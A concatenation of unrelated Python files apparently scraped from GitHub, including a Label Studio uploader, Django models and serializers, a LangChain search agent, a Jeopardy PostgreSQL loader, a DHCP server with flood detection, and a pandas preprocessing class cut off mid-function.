            # consecutive numbers were never fully blanked.
            while itt < len(tags) and tags[itt] in target:
                tags[itt] = "null"
                itt += 1
            break
    # Print the sentence with the blanked run shown as one '______' and
    # accumulate the expected answer.
    ans = ""
    flag = 0
    for word, orig_tag, cur_tag in zip(words, dummy, tags):
        if orig_tag == cur_tag:
            print(word, end=" ")
        else:
            if flag == 0:
                print("______", end=" ")
                flag = 1
            ans = ans + word + " "
    print()
    answer = input("Answer: ") + " "
    # Case-insensitive comparison; both strings carry a trailing space.
    if ans.upper() == answer.upper():
        print("Correct")
        score = score + 1
    else:
        print("Wrong")
        print(ans.split(" "))
        print(answer.split(" "))

print("Your score is: ")
print(score)
| Prime1996/Quizzy | jbgv.py | jbgv.py | py | 2,303 | python | en | code | 1 | github-code | 50 |
16075610767 | # Import the SDK and the client module
import asyncio
import os
import requests
from label_studio_sdk import Client
from const import LABEL_STUDIO_URL, API_KEY, IMPORT_PATH, PROJ_ID
async def upload_img(path):
# Upload the files in ./img
headers = {
'Authorization': 'Token ' + API_KEY,
}
files = {
'FileUpload': (path, open(path, 'rb')),
}
print("已上传:" + path)
return requests.post(LABEL_STUDIO_URL + '/api/projects/' + str(PROJ_ID) + '/import',
headers=headers, files=files)
async def main():
# Connect to the Label Studio API and check the connection
global file
lbsd = Client(url=LABEL_STUDIO_URL, api_key=API_KEY)
if not lbsd.check_connection()['status'] == 'UP':
print('Connection Fails! Please try again.')
else:
print('Connection Succeeds!')
# Find the files in ./img
for root, directory, file in os.walk(IMPORT_PATH):
break
response_table = []
file = list(map(lambda name: IMPORT_PATH + name, file))
for uploader in asyncio.as_completed(map(upload_img, file)):
response_table.append((await uploader).json())
[print(item) for item in response_table]
if __name__ == '__main__':
# loop = asyncio.get_event_loop()
# loop.run_until_complete(main())
asyncio.run(main())
| haifengjia/Label-Studio-PyScripts | importer.py | importer.py | py | 1,378 | python | en | code | 0 | github-code | 50 |
38764130509 | # Definition for a binary tree node.
class TreeNode:
    """A binary-tree node: a value plus optional left/right children."""

    def __init__(self, x):
        self.val = x        # payload
        self.left = None    # left child (TreeNode or None)
        self.right = None   # right child (TreeNode or None)
class Solution:
    def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:
        """Return True iff trees p and q are structurally identical with
        equal node values.

        Time: O(n). Space: O(h) for the recursion stack -- O(log n) when
        balanced, O(n) in the worst case (same bounds as the iterative
        DFS/BFS variants).
        """
        # Both empty: identical. Exactly one empty or values differ: not.
        if p is None and q is None:
            return True
        if p is None or q is None or p.val != q.val:
            return False
        # Recurse into both subtrees.
        return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right)
| coldmanck/leetcode-python | 0100_Same_Tree.py | 0100_Same_Tree.py | py | 1,401 | python | en | code | 5 | github-code | 50 |
44054688012 | from django.db import models
from django.conf import settings
class YoutubeCredential(models.Model):
    """OAuth2 credential bundle tying an auth user's YouTube account to a creator."""

    class Meta:
        db_table = 'youtube_credentials'
        verbose_name = 'Youtube Credential'
        verbose_name_plural = 'Youtube Credentials'

    # One credential row per auth user; also serves as the primary key.
    account_id = models.OneToOneField(
        settings.AUTH_USER_MODEL,
        on_delete=models.CASCADE,
        db_column='account_id',
        primary_key=True,
    )
    # A creator may own several credentials (reverse: creator.youtube_credentials).
    creator_id = models.ForeignKey(
        'creators.Creator',
        on_delete=models.CASCADE,
        db_column='creator_id',
        related_name='youtube_credentials',
    )
    # Raw OAuth2 token material and client configuration, stored verbatim.
    token = models.TextField()
    refresh_token = models.TextField()
    token_uri = models.TextField()
    client_id = models.TextField()
    client_secret = models.TextField()
    scope = models.TextField()
| TonysHub/collaberr-backend | core/api/youtube_analytics/models/auth.py | auth.py | py | 818 | python | en | code | 1 | github-code | 50 |
37210978312 | from typing import Dict, Union
from django.utils.translation import gettext as _
from rest_framework import serializers
from authentication.models import User
from content.models import Resource, Task, Topic
from utils.utils import (
validate_creation_and_deletion_dates,
validate_creation_and_deprecation_dates,
validate_empty,
validate_object_existence,
)
from .models import (
Event,
EventAttendee,
EventAttendeeStatus,
EventFormat,
EventResource,
EventRole,
EventTask,
EventTopic,
Format,
Role,
)
class EventSerializer(serializers.ModelSerializer[Event]):
    """Serializer for Event; rejects empty values in all required fields,
    then validates dates and the creating user's existence."""

    class Meta:
        model = Event
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        required_fields = [
            "name",
            "tagline",
            "type",
            "description",
            "get_involved_text",
            "start_time",
            "end_time",
            "created_by",
            "creation_date",
            "deletion_date",
        ]

        # any() short-circuits on the first empty field, exactly like the
        # original nested isEmpty() helper, but without the inner function.
        if any(data[field] == "" or data[field] is None for field in required_fields):
            raise serializers.ValidationError(
                _(
                    "Only the fields offline_location_lat and offline_location_long fields can be empty for Events."
                ),
                code="invalid_value",
            )

        validate_creation_and_deletion_dates(data)
        validate_object_existence(User, data["created_by"])

        return data
class FormatSerializer(serializers.ModelSerializer[Format]):
    """Serializer for Format rows.

    Fixed the generic parameter from ModelSerializer[Event] to
    ModelSerializer[Format] (copy-paste typo; purely a typing fix,
    runtime behavior is unchanged).
    """

    class Meta:
        model = Format
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # Order matters: each helper raises on first failure.
        validate_empty(data["name"], "name")
        validate_empty(data["description"], "description")
        validate_creation_and_deprecation_dates(data)
        validate_creation_and_deletion_dates(data)
        return data
class RoleSerializer(serializers.ModelSerializer[Role]):
    """Serializer for Role rows.

    Fixed the generic parameter from ModelSerializer[Event] to
    ModelSerializer[Role] (copy-paste typo; purely a typing fix,
    runtime behavior is unchanged).
    """

    class Meta:
        model = Role
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # Order matters: each helper raises on first failure.
        validate_empty(data["name"], "name")
        validate_empty(data["description"], "description")
        validate_creation_and_deprecation_dates(data)
        return data
class EventAttendeeSerializer(serializers.ModelSerializer[EventAttendee]):
    """Serializer for EventAttendee; requires existing event, user and role."""

    class Meta:
        model = EventAttendee
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # Emptiness checks run before FK existence checks; the call order
        # determines which validation error surfaces first.
        validate_empty(data["event_id"], "event_id")
        validate_empty(data["user_id"], "user_id")
        validate_empty(data["role_id"], "role_id")
        validate_object_existence(Event, data["event_id"])
        validate_object_existence(User, data["user_id"])
        validate_object_existence(Role, data["role_id"])
        return data
class EventFormatSerializer(serializers.ModelSerializer[EventFormat]):
    """Serializer for the Event<->Format link table."""

    class Meta:
        model = EventFormat
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # Emptiness checks first, then FK existence; order fixes which
        # validation error the client sees first.
        validate_empty(data["event_id"], "event_id")
        validate_empty(data["format_id"], "format_id")
        validate_object_existence(Event, data["event_id"])
        validate_object_existence(Format, data["format_id"])
        return data
class EventAttendeeStatusSerializer(serializers.ModelSerializer[EventAttendeeStatus]):
    """Serializer for EventAttendeeStatus; no custom validation is applied."""

    class Meta:
        model = EventAttendeeStatus
        fields = "__all__"
class EventResourceSerializer(serializers.ModelSerializer[EventResource]):
    """Serializer for the Event<->Resource link table."""

    class Meta:
        model = EventResource
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # Emptiness checks first, then FK existence; order fixes which
        # validation error the client sees first.
        validate_empty(data["event_id"], "event_id")
        validate_empty(data["resource_id"], "resource_id")
        validate_object_existence(Event, data["event_id"])
        validate_object_existence(Resource, data["resource_id"])
        return data
class EventRoleSerializer(serializers.ModelSerializer[EventRole]):
    """Serializer for the Event<->Role link table."""

    class Meta:
        model = EventRole
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # NOTE(review): unlike the attendee/format/resource serializers above,
        # this one skips validate_empty() -- confirm whether that asymmetry
        # is intentional.
        validate_object_existence(Event, data["event_id"])
        validate_object_existence(Role, data["role_id"])
        return data
class EventTaskSerializer(serializers.ModelSerializer[EventTask]):
    """Serializer for the Event<->Task link table."""

    class Meta:
        model = EventTask
        fields = "__all__"

    def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
        # Only FK existence is checked (no validate_empty), matching
        # EventRoleSerializer/EventTopicSerializer.
        validate_object_existence(Event, data["event_id"])
        validate_object_existence(Task, data["task_id"])
        return data
class EventTopicSerializer(serializers.ModelSerializer[EventTopic]):
class Meta:
model = EventTopic
fields = "__all__"
def validate(self, data: Dict[str, Union[str, int]]) -> Dict[str, Union[str, int]]:
validate_object_existence(Event, data["event_id"])
validate_object_existence(Topic, data["topic_id"])
return data
| PabloSSena/activist | backend/events/serializers.py | serializers.py | py | 5,342 | python | en | code | null | github-code | 50 |
32660302619 | '''
Created on Oct 12, 2018
@author: purboday
'''
from riaps.run.comp import Component
import logging
import time
import os
class Seller(Component):
def __init__(self, sellernum):
super(Seller, self).__init__()
self.pid = os.getpid()
now = time.ctime(int(time.time()))
self.logger.info("(PID %s)-starting Seller, %s" %(str(self.pid),str(now)))
self.sellernum = str(sellernum)
self.bidamt = 0
self.assigned = ''
self.winner = ''
self.price = 0
self.active = False
self.pulse = 0
self.buyers = 3
self.assignedbuyers = {}
self.biddingbuyers = 0
def on_assignport(self):
# Receive bid
msg = self.assignport.recv_pyobj()
self.logger.info(str(msg))
if self.active == True:
msg = msg.split(',')
if not msg[0] == 'assigned':
self.biddingbuyers+= 1
obj = str(msg[0])
bidamt = float(msg[1])
buyernum = msg[2]
if obj == self.sellernum:
self.logger.info("Seller %s received bid %f from Buyer %s" % (self.sellernum, bidamt, buyernum))
if bidamt >= self.bidamt:
self.bidamt = float(msg[1])
self.winner = buyernum
else:
self.assignedbuyers[msg[1]] = msg[0]
self.logger.info('assigned = %d, bidding = %d' % (len(self.assignedbuyers), self.biddingbuyers))
if self.biddingbuyers + len(self.assignedbuyers) == self.buyers:
if len(self.assignedbuyers) < self.buyers:
self.assignment()
# def on_timeout(self):
# now = self.timeout.recv_pyobj()
# if self.active:
# self.pulse += 1
# if self.pulse == 4:
# self.active = False
# self.logger.info('finalizing bids for seller [PID: %s]' %(self.pid))
# if not self.assigned == '':
# freed = self.assigned
# else:
# freed = ''
# self.assigned = self.winner
# self.logger.info("seller %s temporarily assigned to buyer %s" % (self.sellernum, self.assigned))
# self.freebuyer.send_pyobj('assigned_'+self.assigned+'_'+self.sellernum)
# if not freed == '':
# self.freebuyer.send_pyobj('freed_'+freed)
# self.price += self.bidamt
# msg = self.sellernum+'_'+str(self.price)
# self.logger.info('seller %s sending new price' % self.sellernum)
# self.sendprice.send_pyobj(msg)
# self.active = True
# self.pulse = 0
def assignment(self):
# now = self.timeout.recv_pyobj()
self.logger.info('finalizing bids for seller [PID: %s]' %(self.pid))
self.price += self.bidamt
if not self.winner == '':
if not self.assigned == '':
freed = self.assigned
else:
freed = ''
self.assigned = self.winner
self.logger.info("seller %s temporarily assigned to buyer %s" % (self.sellernum, self.assigned))
self.freebuyer.send_pyobj('assigned_'+self.assigned+'_'+self.sellernum)
if not freed == '':
self.freebuyer.send_pyobj('freed_'+freed)
else:
msg = self.sellernum+'_'+str(self.price)
self.logger.info('seller %s sending new price' % self.sellernum)
self.assignedbuyers.clear()
self.biddingbuyers = 0
self.winner = ''
self.bidamt = 0
time.sleep(5)
self.sendprice.send_pyobj(msg)
def on_recvack(self):
resp = self.recvack.recv_pyobj()
if not self.winner == '':
msg = self.sellernum+'_'+str(self.price)
self.logger.info('seller %s sending new price' % self.sellernum)
self.assignedbuyers.clear()
self.biddingbuyers = 0
self.winner = ''
self.bidamt = 0
time.sleep(5)
self.sendprice.send_pyobj(msg)
def on_notify(self):
msg = self.notify.recv_pyobj()
if msg == 'start':
self.active = True
self.logger.info('starting negotiation round')
self.assignedbuyers.clear()
self.biddingbuyers = 0
self.winner = ''
self.bidamt = 0
msg = self.sellernum+'_'+str(self.price)
self.sendprice.send_pyobj(msg)
elif msg == 'stop':
self.active = False
self.logger.info('seller %s assigned to buyer %s' % (self.sellernum, self.assigned))
def __destroy__(self):
now = time.time()
self.logger.info("%s - stopping Seller, %s" %(str(self.pid),now)) | purboday/UGridAuction | ugrig_auction/Seller.py | Seller.py | py | 4,992 | python | en | code | 2 | github-code | 50 |
26240052838 | import langchain
from langchain import OpenAI, LLMChain, PromptTemplate, SerpAPIWrapper, LLMMathChain, GoogleSearchAPIWrapper
from langchain.memory import ConversationBufferMemory, ConversationSummaryMemory
from langchain.agents import load_tools, initialize_agent, Tool, AgentType
from langchain.callbacks import get_openai_callback
import streamlit as st
from config import LLM, CHAT_LLM
def main():
st.set_page_config(page_title="OpenAI Chat with SerpAI")
st.header("Ask a question 💬")
user_question = st.text_input("Input text here....")
# user_question = "杭州今日的天气。用中文回答"
if user_question:
llm_math_chain = LLMMathChain.from_llm(llm=LLM, verbose=True)
search = SerpAPIWrapper(params={
"engine": "google",
})
tools = [
Tool(
name="search",
func=search.run,
description="useful when you need to answer questions about current events. You should ask pointed questions"
),
Tool(
name="Calculator",
func=llm_math_chain.run,
description="useful when you need to answer math questions"
)
]
# tools.extend(load_tools(["llm-math"], llm=LLM))
agent = initialize_agent(
tools=tools,
llm=CHAT_LLM,
agent=AgentType.ZERO_SHOT_REACT_DESCRIPTION, # only one works
memory=ConversationSummaryMemory(memory_key="history", llm=LLM),
handle_parsing_errors=True,
verbose=True
)
# langchain.debug = True
print(agent.run('用中文回答: ' + user_question))
# langchain.debug = False
with get_openai_callback() as cb:
response = agent.run(user_question)
print(cb)
st.write(response)
main()
# template = """Assistant is a large language model trained by OpenAI.
# Assistant is designed to be able to assist with a wide range of tasks, from answering simple questions to providing in-depth explanations and discussions on a wide range of topics. As a language model, Assistant is able to generate human-like text based on the input it receives, allowing it to engage in natural-sounding conversations and provide responses that are coherent and relevant to the topic at hand.
# Assistant is constantly learning and improving, and its capabilities are constantly evolving. It is able to process and understand large amounts of text, and can use this knowledge to provide accurate and informative responses to a wide range of questions. Additionally, Assistant is able to generate its own text based on the input it receives, allowing it to engage in discussions and provide explanations and descriptions on a wide range of topics.
# Overall, Assistant is a powerful tool that can help with a wide range of tasks and provide valuable insights and information on a wide range of topics. Whether you need help with a specific question or just want to have a conversation about a particular topic, Assistant is here to assist.
# {history}
# Human: {human_input}
# Assistant:"""
# prompt = PromptTemplate(input_variables=["history", "human_input"], template=template)
# chat_chain = LLMChain(
# llm=OpenAI(temperature=0),
# prompt=prompt,
# verbose=True,
# memory=ConversationBufferMemory(memory_key="chat_history", input_key="input"),
# )
# output = chat_chain.predict(
# human_input="I want you to act as a Linux terminal. I will type commands and you will reply with what the terminal should show. I want you to only reply with the terminal output inside one unique code block, and nothing else. Do not write explanations. Do not type commands unless I instruct you to do so. When I need to tell you something in English I will do so by putting text inside curly brackets {like this}. My first command is pwd."
# )
# print(output)
| kpister/prompt-linter | data/scraping/repos/cfa532~chroma-langchain-tutorial/GPTClone.py | GPTClone.py | py | 3,951 | python | en | code | 0 | github-code | 50 |
36082321562 | import psycopg2
class DatabaseConnection:
def __init__(self, connect_args=None):
with open('password.txt') as f:
password = f.readline()
try:
if connect_args is None:
self.connection = psycopg2.connect('dbname=jeopardy user=luke password=' + password)
else:
self.connection = psycopg2.connect(connect_args)
self.connection.autocommit = True
self.cursor = self.connection.cursor()
except psycopg2.Error as e:
print("Error connecting to database" + '\n' + e.pgcode + '\n' + e.pgerror)
def close(self):
try:
self.cursor.close()
self.connection.close()
except psycopg2.Error as e:
print("Error closing the connection." + '\n' + e.pgcode + '\n' + e.pgerror)
def insert_parsed_game(self, episode_num, game_link):
print('Inserting game into parsed list')
self.cursor.execute('''
INSERT INTO parsed_games(episode_num, game_link)
VALUES (%s, %s);
''', (episode_num, game_link))
def insert_season(self, name, start_date, end_date, total_games):
print('Inserting season')
self.cursor.execute('''
INSERT INTO seasons (season_name, start_date, end_date, total_games)
VALUES (%s, %s, %s, %s);
''', (name, start_date, end_date, total_games))
def insert_contestant(self, name, notes, games_played, total_winnings):
print('Inserting contestant')
self.cursor.execute('''
INSERT INTO contestants (name, notes, games_played, total_winnings)
VALUES (%s, %s, %s, %s);
''', (name, notes, games_played, total_winnings))
def insert_game(self, episode_num, season_id, air_date, notes, contestant1, contestant2, contestant3,
winner, score1, score2, score3):
print(f'Inserting game {episode_num}')
self.cursor.execute('''
INSERT INTO
games (episode_num, season_id, air_date, notes, contestant1, contestant2, contestant3, winner, score1, score2, score3)
VALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s);
''', (episode_num, season_id, air_date, notes, contestant1, contestant2, contestant3, winner,
score1, score2, score3))
def insert_question(self, game_id, value, daily_double, round, category, clue, response):
# print('Inserting clue')
self.cursor.execute('''
INSERT INTO clues (game_id, value, daily_double, round, category, clue, response)
VALUES (%s, %s, %s, %s, %s, %s, %s);
''', (game_id, value, daily_double, round, category, clue, response))
def print_seasons(self):
self.cursor.execute('SELECT * FROM seasons ORDER BY id;')
seasons = self.cursor.fetchall()
for season in seasons:
print(season)
def print_contestants(self):
self.cursor.execute('SELECT * FROM contestants ORDER BY id;')
contestants = self.cursor.fetchall()
for contestant in contestants:
print(contestant)
def print_games(self):
self.cursor.execute('SELECT * FROM games ORDER BY id;')
games = self.cursor.fetchall()
for game in games:
print(game)
def print_questions(self):
self.cursor.execute('SELECT * FROM clues ORDER BY id;')
questions = self.cursor.fetchall()
for question in questions:
print(question)
def game_parsed(self, episode_num):
self.cursor.execute('SELECT * FROM parsed_games WHERE episode_num=(%s)', (episode_num, ))
episode_num_found = len(self.cursor.fetchall()) > 0
return episode_num_found
def update_contestant(self, name, notes=None, games_played=None, total_winnings=None):
if games_played is not None:
self.cursor.execute('''
UPDATE contestants
SET games_played = (%s)
WHERE name = (%s);''', (games_played, name))
if notes is not None:
self.cursor.execute('''
UPDATE contestants
SET notes = (%s)
WHERE name = (%s);''', (notes, name))
if total_winnings is not None:
self.cursor.execute('''
UPDATE contestants
SET total_winnings = (%s)
WHERE name = (%s);''', (total_winnings, name))
def contestant_exists(self, name):
self.cursor.execute('''SELECT * FROM contestants WHERE name = (%s);''', (name,))
contestant = self.cursor.fetchone()
return contestant is not None
def get_contestant_games_played(self, name):
self.cursor.execute('''SELECT games_played FROM contestants WHERE name = (%s);''', (name,))
total_winnings = self.cursor.fetchone()
return total_winnings[0]
def get_contestant_winnings(self, name):
self.cursor.execute('''SELECT total_winnings FROM contestants WHERE name = (%s);''', (name,))
total_winnings = self.cursor.fetchone()
return total_winnings[0]
def get_contestant_id_from_name(self, name):
self.cursor.execute('''SELECT id FROM contestants WHERE name = (%s);''', (name,))
total_winnings = self.cursor.fetchone()
return total_winnings[0]
def get_game_from_episode_number(self, episode_number):
self.cursor.execute('''SELECT id FROM games WHERE episode_num = (%s);''', (episode_number,))
game_id = self.cursor.fetchone()
return game_id[0]
def setup_database(self):
# Parsed Games Table
self.cursor.execute('''
CREATE TABLE parsed_games (
id serial PRIMARY KEY,
episode_num integer,
game_link VARCHAR
);
''')
# Seasons Table
self.cursor.execute('''
CREATE TABLE seasons (
id serial PRIMARY KEY,
season_name VARCHAR(16),
start_date DATE,
end_date DATE,
total_games integer
);
''')
# Contestants Table
self.cursor.execute('''
CREATE TABLE contestants (
id serial PRIMARY KEY,
name VARCHAR NOT NULL,
notes VARCHAR,
games_played integer NOT NULL,
total_winnings integer
);
''')
# Games Table
self.cursor.execute('''
CREATE TABLE games (
id serial PRIMARY KEY,
episode_num INT UNIQUE,
season_id INT,
air_date DATE NOT NULL,
notes VARCHAR,
contestant1 INT,
contestant2 INT,
contestant3 INT,
winner INT,
score1 INT,
score2 INT,
score3 INT,
FOREIGN KEY (season_id) REFERENCES seasons (id),
FOREIGN KEY (contestant1) REFERENCES contestants (id),
FOREIGN KEY (contestant2) REFERENCES contestants (id),
FOREIGN KEY (contestant3) REFERENCES contestants (id),
FOREIGN KEY (winner) REFERENCES contestants (id)
);
''')
# Questions Table
self.cursor.execute('''
CREATE TABLE clues (
id serial PRIMARY KEY,
game_id INT,
value INT NOT NULL,
daily_double BOOLEAN NOT NULL,
round VARCHAR NOT NULL,
category VARCHAR NOT NULL,
clue VARCHAR NOT NULL,
response VARCHAR NOT NULL,
FOREIGN KEY (game_id) REFERENCES games (id)
);
''')
def delete_database(self):
self.cursor.execute('DROP TABLE games CASCADE')
self.cursor.execute('DROP TABLE seasons CASCADE')
self.cursor.execute('DROP TABLE contestants CASCADE')
self.cursor.execute('DROP TABLE clues CASCADE')
self.cursor.execute('DROP TABLE parsed_games')
| lukelavin/J-Archive-Parser | DatabaseConnection.py | DatabaseConnection.py | py | 7,785 | python | en | code | 0 | github-code | 50 |
40427726123 | import time
def CountFrequency(mylist):
#creating an empty dictionary
freq={}
for item in mylist:
if(item in freq):
freq[item] += 1
else:
freq[item] = 1
for key,value in freq.items():
print("%d : %d"%(key,value))
#driver funtion
if __name__ == "__main__":
start = time.time()
mylist = [1,1,1,5,5,5,6,6,6,7,8,11,8,5,7,9,10,16,12,3]
CountFrequency(mylist)
end = time.time()
print("Total time taken is",(end-start)*1000)
def CountFrequency(mylist):
freq = {}
for items in mylist:
freq[items] = mylist.count(items)
print(freq)
if __name__ == "__main__":
start = time.time()
mylist = [1,1,1,5,5,5,6,6,6,7,8,11,8,5,7,9,10,16,12,3]
CountFrequency(mylist)
end = time.time()
print("total time taken is",(end-start)*1000)
import numpy as np
start = time.time()
a = np.array = ([10,10,20,10,20,20,20,30,40,50,60,60,50,0])
unique_elements,count_elements = np.unique(a,return_counts = True)
print(np.asarray((unique_elements,count_elements)))
end = time.time()
print("Total time taken is",(end-start)*1000)
| ArnabBasak/PythonRepository | Python_Programs/frequenceCount.py | frequenceCount.py | py | 1,130 | python | en | code | 0 | github-code | 50 |
46722441828 | from socket import *
import binascii
from scapy.all import *
import json
import os
from ipaddress import *
import ser_fct
import datetime
serverPort = 67
serverSocket = socket.socket(socket.AF_INET,socket.SOCK_DGRAM)
#pour permettre la réutilisation d'adresse et le bind() sur des ports réservés
serverSocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
serverSocket.bind(('',serverPort))
list_mac=[]
count=0
c=0
while True:# le serveur écoute en boucle
with open('config.json','r+') as f:
config=json.load(f)
ser_fct.poolupdate(config['lease'])# rafraichir le pool régulièrement pour effacer les baux expirés.
print('The server is listening ...')
message, clientAddress = serverSocket.recvfrom(2048) #réception en brut
message=binascii.hexlify(message).decode('utf-8') #décode le message brut
message = str(message) #génère une chaine de hex
#print(message)
hwddr = ser_fct.raw_mac(bytes.fromhex(message[56:68])) #recupère l'@ MAC depuis le paquet brut recu
#print(hwddr)
raw_packet = binascii.unhexlify(message) # tranformer le string de hex en bytes
new_packet= BOOTP(raw_packet) # recevoir les bytes comme un trame avec une pdu DHCP près à l'utilisation par scapy
#print(new_packet)
#print("packet DHCP received. See details below : \n")
#new_packet.show() # pour afficher les champs détaillé du paquet
Ry_addr = ser_fct.get_option(new_packet[BOOTP].options, 'requested_addr')
#################################Parade aux attakcs#########################################
#Vérifier si l'addresse Mac qui envoie à notre serveur est autorisé
with open("Mac.json","r+") as f:
d=json.load(f)
lis=[s[:16] for s in d["autorised"]]
if (new_packet[BOOTP].chaddr.decode()not in lis):
continue;
#Vérifier si l'addresse Mac qui envoie à notre serveur est blacklisté
with open("blacklist.json","r+") as f:
d=json.load(f)
if new_packet[BOOTP].chaddr.decode() in d["blacklist"]:
continue;
if new_packet[DHCP].options[0][1]== 3:
count+=1
if count>=c:
c=count
if len(list_mac) ==0:
t=time.time()
list_mac.append(new_packet[BOOTP].chaddr.decode())
if (count>100 and (time.time()-t)<=6):
with open("blacklist.json","r+") as f:
d=json.load(f)
d['blacklist'].extend(list_mac)
f.seek(0)
d['blacklist']=list(dict.fromkeys(d['blacklist']))
json.dump(d,f,indent=4)
with open("attack_logs.txt","r+") as f:
f.write("Warning an attack was detected by @mac {} at {}".format(list(dict.fromkeys(list_mac)),datetime.datetime.now()))
elif (time.time()-t)>10:
t=time.time()
list_mac=[]
count=0
##########################Parade aux attacks###############################################################################
#On répond par offer ou ack selon le message reçu
if new_packet[DHCP].options[0][1]== 1 : #cas d'un discover
with open('config.json','r+') as f:
config=json.load(f)
Ry_addr = ser_fct.get_option(new_packet[DHCP].options, 'requested_addr') #chercher l'adresse requise par le discover
print(Ry_addr)
if Ry_addr != None: #si une adresse Ry_addr est requise
# vérifier que cette adresse peut être attribuée
print(ser_fct.ackornack(Ry_addr, config['network'], config['poolstart'], config['poolend']))
if ser_fct.ackornack(Ry_addr, config['network'], config['poolstart'], config['poolend']):
ser_fct.send_offer(new_packet,Ry_addr, config, hwddr) # envoyer un offer pour suggérer cette même adresse requise
else : # sinon si aucune adresse n'est requise on propose une nouvelle adresse depuis sélectionné à partir du pool
y_addr=ser_fct.selectadd(config['network'],config['poolstart'],config['poolend'])
ser_fct.send_offer(new_packet, y_addr, config, hwddr)
elif new_packet[DHCP].options[0][1]== 3 : #cas d'un dhcprequest
with open('config.json','r+') as f:
config=json.load(f)
# recupérer l'adresse requise dans le champ requested adresse
Ry_addr= ser_fct.get_option(new_packet[DHCP].options, 'requested_addr')
#vérifier que l'adresse est permise
if ser_fct.ackornack(Ry_addr, config['network'], config['poolstart'], config['poolend']):
ser_fct.send_ack(new_packet,config, hwddr) #accepter d'octroyer l'adresse
ser_fct.save2pool(Ry_addr, hwddr) # enregistrer cette adresse et l'ientifiant du client servi
else :
print("Aucune réponse n'est envoyée") #sinon si adresse non disponible, en suggérer une autre avec un dhcpoffer
pass #aucun ack ou nack n'est envoyé serveur revient en écoute
else :
pass
print(c)
| Arouiwassim/DHCP-Server | server.py | server.py | py | 5,263 | python | fr | code | 0 | github-code | 50 |
69812516317 | import dash
# external_stylesheets = ['https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css']
# meta_tags are required for the app layout to be mobile responsive
app = dash.Dash(
__name__,
suppress_callback_exceptions=True,
meta_tags=[
{"name": "viewport", "content": "width=device-width, initial-scale=1.0"}
],
)
server = app.server
app.title = "Find a pet-sitter nearby!"
app.server.static_folder = "static"
| Makoto1021/coco | app.py | app.py | py | 467 | python | en | code | 0 | github-code | 50 |
"""
Created on Thu May 11 10:19:01 2017
@author: Viktor Andersson
"""
# This .py file is about loading a data frame with the help of Pandas, and then preprocess the data into a arbitrary format.
# TODO: Should save corresponding numbers to a file
# String compare
import csv
import os
from pathlib import Path
import pandas as pd # pandas is a dataframe library
import matplotlib.pyplot as plt # matplotlib.pyplot plots data
#import numpy as np # numpy provides N-dim object support
from sklearn.preprocessing import LabelEncoder # Needed for the dummy encoding
from sklearn.cross_validation import train_test_split # Used to split data into Training set and Test Set
class DataFrame:
def __init__(self, filePath, testSize):
self.df = self.LoadDataFrame(filePath)
# Training and Test set for Machine Learning
self.X_train = -1
self.X_test = -1
self.y_train = -1
self.y_test = -1
self.testSize = testSize
# Loads the Data Frame
def LoadDataFrame(self, filePath):
try:
return pd.read_csv(filePath)
except:
print("Invalid file name or File format, " + filePath)
# Prints the desired data frame rows
def PrintDataFrame(self, numRows):
if(numRows <= 0):
print(self.df.head())
print()
else:
print(self.df.head(numRows))
print()
# Prints the True/false Ration of the Data Frame
def TrueFalseRatio(self):
num_true = len(self.df.loc[self.df['Legitimate'] == True])
num_false = len(self.df.loc[self.df['Legitimate'] == False])
print("True/False Ratio:")
print("Number of True cases: {0} ({1:2.2f}%)".format(num_true, (num_true / (num_true + num_false)) * 100))
print("Number of False cases: {0} ({1:2.2f}%)".format(num_false, (num_false / (num_true + num_false)) * 100))
print()
def SanityCheck(self):
print("RowsxColumns: ", end = "")
print(self.df.shape)
print("NaN Values: ", end = "")
print(self.df.isnull().values.any())
# Print all NaN values
if(self.df.isnull().values.any()):
print(self.df[pd.isnull(self.df).any(axis=1)])
def Lookup(self, columnName, Value):
print(self.df.loc[self.df[columnName] == Value])
def GetIndex(self, columnName, Value):
return self.df.loc[self.df[columnName] == Value].index.get_values()
def SaveCSVFile(self, string):
self.df.to_csv(string + '.csv', index = False)
print('Saved file: ' + string + '.csv')
##################################################################
# Data Preprocessing #
##################################################################
# TODO: Find a more generic way of doing this. Word embedding? gensim?
def UpdateRegisters(self, dataFrame, columnName, axis, registerName = ''):
if registerName == '':
fileName = '1' + columnName + 'Register.csv'
else:
fileName = registerName
if Path(fileName).is_file():
print('File already exists. Added new information to old file.')
#print('File Removed.')
#os.remove(fileName)
else:
print('File 1' + columnName + 'Register.csv created.')
with open(fileName, 'w') as csvfile:
fieldnames = ['TempColumn']
#fieldnames = ['Name', 'SurName', 'Street', 'City']
writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
writer.writeheader()
# Loads register csv
tempRegisterdf = pd.read_csv(fileName)
# Merge the desired Column with the desired register
if tempRegisterdf.columns[[0]] == 'TempColumn':
result = pd.concat([tempRegisterdf, dataFrame[columnName]], axis = axis, verify_integrity = True, copy = False)
# Drops the Temp Column
result.drop(tempRegisterdf.columns[[0]], axis = axis, inplace = True)
# Drops the last duplicate found
#result = result.drop_duplicates(result.columns.difference([columnName]))
#result.drop_duplicates(inplace = True)
#result = result.append(dataFrame[columnName])
# Drop NaN values
#result.dropna(inplace = True)
else:
#result = pd.merge(tempDf, dataFrame, on = 'Name')
#result = pd.concat([tempDf[columnName], dataFrame[columnName]], axis = 1, verify_integrity = True, copy = False)
# This is kinda bad, O(n) should be better performance
tempDf2 = dataFrame[columnName].drop_duplicates()
tempDf2.dropna(inplace = True)
values = list(tempDf2)
i = 0
while i < len(values):
